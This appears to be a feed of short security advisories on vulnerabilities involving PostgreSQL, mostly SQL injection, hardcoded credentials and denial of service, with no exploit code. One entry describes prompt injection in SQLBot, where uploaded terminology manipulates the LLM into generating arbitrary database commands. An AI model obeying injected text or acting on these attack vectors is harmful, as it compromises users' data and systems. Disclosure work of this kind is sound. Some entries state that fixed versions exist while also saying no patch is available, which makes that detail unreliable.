SQL injection in PostgreSQL via unsafe backslash handling in Kysely's query compiler allows unauthenticated remote attackers to execute arbitrary SQL commands by injecting backslashes into JSON path string literals that bypass quote escaping. The vulnerability affects systems using the default BACKSLASH_ESCAPES SQL mode, where attackers can break out of sanitized JSON path expressions through specially crafted input. No patch is currently available.

SQLBot, an intelligent data query system based on large language models and RAG, contains a critical SQL injection vulnerability in the /api/v1/datasource/uploadExcel endpoint that allows authenticated users with minimal privileges to achieve remote code execution on the backend server. SQLBot versions prior to 1.7.0 are affected, and attackers can exploit unsafe concatenation of Excel sheet names into PostgreSQL table names and COPY statements to inject malicious SQL commands. The vulnerability enables arbitrary command execution as the postgres user, database takeover, and sensitive file exfiltration including /etc/passwd and /etc/shadow.

Remote code execution in SQLBot 1.5.0 and below allows authenticated users to inject malicious prompts through unsanitized terminology uploads, enabling attackers to manipulate the LLM into generating arbitrary PostgreSQL commands executed with database privileges. The vulnerability stems from missing permission checks on the Excel upload API combined with inadequate semantic isolation when injecting user-controlled data into the system prompt. An attacker can exploit this to achieve code execution on the database or application server running as the postgres user.

PostgreSQL client applications using the pgproto3 Go library (github.com/jackc/pgproto3/v2) can be crashed remotely by malicious or compromised PostgreSQL servers sending specially crafted DataRow messages with negative field lengths, triggering slice bounds panics that result in denial of service. The vulnerability requires no authentication and has low attack complexity (CVSS:3.1/AV:N/AC:L/PR:N/UI:N), though the EPSS score of 0.07% (20th percentile) suggests minimal observed exploitation activity. Multiple detailed technical advisories exist including analysis from Security Infinity, and the issue is tracked in GitHub issue #2507 for the pgx project.

SQL injection in PostgreSQL StatementGenerator allows authenticated attackers to execute arbitrary SQL commands through unsanitized object keys in sort, select, and groupBy parameters on analytics endpoints. The vulnerability exists because column name validation was incompletely applied during a previous fix, leaving three query construction methods vulnerable to direct identifier injection. An attacker with valid credentials can exploit this to access or manipulate database contents without requiring user interaction.

Kysely through version 0.28.11 contains a SQL injection vulnerability in JSON path compilation affecting MySQL and SQLite dialects. The visitJSONPathLeg() function appends user-controlled values from .key() and .at() methods directly into single-quoted JSON path string literals without escaping single quotes, enabling attackers to break out of the string context and inject arbitrary SQL. A working proof-of-concept demonstrates UNION-based data exfiltration from SQLite databases. The vulnerability has CVSS score 8.2 and patches are available from the vendor.

Administrative users of Docker and PostgreSQL deployments can exploit an incomplete path validation in the `POST /api/file/globalCopyFiles` endpoint to copy sensitive files like container environment variables and Docker secrets from restricted locations (`/proc/`, `/run/secrets/`) into the workspace, where they become readable via standard file APIs. The vulnerability stems from reliance on a blocklist-based validation mechanism that fails to prevent access to these critical system paths. Since no patch is currently available, organizations should restrict administrative access to the affected API endpoint until an update is released.

A critical unrestricted file upload vulnerability exists in the Profile Picture Handler component of JawherKl's node-api-postgres library (versions up to 2.5), where improper validation in the path.extname function of index.js allows attackers to upload malicious files remotely without authentication. A proof-of-concept exploit is publicly available, making this vulnerability actively exploitable, though it is not currently listed in CISA's KEV catalog and no EPSS score is provided.

SQL injection in the User.getAll function of node-api-postgres up to version 2.5 allows remote attackers to manipulate the sort parameter and execute arbitrary SQL commands. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification. Affected deployments using PostgreSQL with the vulnerable Node.js API library face risks of unauthorized data access, modification, and potential service disruption.

SQL injection in AnythingLLM versions 1.11.1 and earlier enables authenticated users to execute arbitrary SQL commands against connected PostgreSQL, MySQL, and MSSQL databases through the built-in SQL Agent plugin. The vulnerability stems from unsafe string concatenation of table names in the getTableSchemaSql() method across all three database connectors, bypassing proper parameterization. Any user with access to invoke the SQL Agent can exploit this to read, modify, or delete sensitive database contents.

Unauthenticated query injection in Parse Server before 9.6.0-alpha.12/8.6.38. PoC available.

Veeam Backup & Replication allows a user with the Backup Viewer role (read-only) to escalate to remote code execution as the postgres database user. A read-only role achieving RCE represents a severe privilege escalation with scope change.

An attacker with access to the master key can inject malicious SQL via crafted field names used in query constraints when Parse Server is configured with PostgreSQL as the database. The field name in a `$regex` query operator is passed to PostgreSQL using unparameterized string interpolation, allowing the attacker to manipulate the SQL query. While the master key controls what can be done through the Parse Server abstraction layer, this SQL injection bypasses Parse Server entirely and operates at the database level. This vulnerability only affects Parse Server deployments using PostgreSQL. The fix applies proper SQL identifier escaping to field names in the query handler and hardens query field name validation to reject malicious field names for all query types. There is no known workaround. - GitHub security advisory: https://github.com/parse-community/parse-server/security/advisories/GHSA-c442-97qw-j6c6 - Fix Parse Server 9: https://github.com/parse-community/parse-server/releases/tag/9.6.0-alpha.10 - Fix Parse Server 8: https://github.com/parse-community/parse-server/releases/tag/8.6.36

Parse Server versions prior to 9.6.0-alpha.6 and 8.6.32 allow attackers to bypass class-level permission restrictions on protected fields by using dot-notation in query and sort parameters, enabling enumeration of sensitive field values through binary oracle attacks. This affects both MongoDB and PostgreSQL deployments and requires no authentication or user interaction. No patch is currently available for affected versions.

SQL injection in Parse Server before 9.6.0-alpha.5/8.6.31. Third Parse Server SQLi.

SQL injection in Parse Server before 9.6.0-alpha.5/8.6.31.

SQL injection in Parse Server before 9.6.0-alpha.2/8.6.28.

CWE-798: Use of Hard-coded Credentials vulnerability exists that could cause information disclosure and remote code execution when SOCKS Proxy is enabled, and administrator credentials and PostgreSQL database credentials are known. SOCKS Proxy is disabled by default.

Command injection in Budibase 3.23.22 and earlier allows authenticated attackers with high privileges to execute arbitrary system commands by injecting malicious values into PostgreSQL connection parameters that are unsanitized in shell command construction. An attacker with administrative access can exploit this vulnerability to gain complete control over the underlying server hosting the Budibase instance. No patch is currently available for this vulnerability.

SQL injection in WeKnora LLM document understanding framework allows authenticated users to extract arbitrary database contents. CVSS 9.9 with scope change. PoC available.

Arbitrary code execution in TimescaleDB 2.23.0 through 2.25.1 allows local authenticated users to execute malicious functions by shadowing built-in PostgreSQL functions through user-writable schemas in the search_path setting during extension upgrades. An attacker with database access can create malicious functions in writable schemas that are invoked instead of legitimate PostgreSQL functions, resulting in code execution with database privileges. No patch is currently available for affected installations.

SQL injection in Chartbrew before 4.8.3. PoC available.

Packetbeat's PostgreSQL protocol parser improperly validates array indices, allowing authenticated attackers on the same network to crash the monitoring service by sending malicious packets. An attacker exploiting this denial-of-service vulnerability can terminate the Packetbeat process, disrupting monitoring capabilities on systems with PostgreSQL protocol monitoring enabled. No patch is currently available.

Authenticated users in Apache Superset versions before 6.0.0 can execute write operations against PostgreSQL databases configured as read-only by crafting specially formatted SQL statements that evade validation checks. This allows an attacker with SQLLab access to perform unauthorized data modifications despite read-only protections being in place. No patch is currently available for affected versions.

Insufficient SQL function restrictions in Apache Superset before 4.1.2 allow authenticated users to execute sensitive database functions on ClickHouse engines that should have been blocked. An attacker with database access could leverage the incomplete DISALLOWED_SQL_FUNCTIONS list to bypass security controls and potentially extract or manipulate data. No patch is currently available for affected versions of Apache Superset, PostgreSQL, and related deployments.

Hardcoded SSH keys in Ruckus Network Director OVA < 4.5.0.56 for postgres user. Same across all appliances.

Hardcoded PostgreSQL credentials in Ruckus Network Director OVA < 4.5.0.54.

Denial of service in Traefik versions prior to 3.6.8 allows unauthenticated remote attackers to exhaust connection resources by exploiting improper timeout handling in STARTTLS request processing. An attacker can send a PostgreSQL SSLRequest prelude and then stall the connection indefinitely, bypassing the readTimeout protection and accumulating open connections until service availability is degraded. A patch is available in version 3.6.8.

Heap buffer overflow in the pg_trgm extension of PostgreSQL 18.0 and 18.1 allows authenticated database users to trigger memory corruption through specially crafted input strings. An attacker with database access could potentially achieve privilege escalation or cause service disruption, though exploit complexity is currently limited by restricted control over written data. No patch is currently available.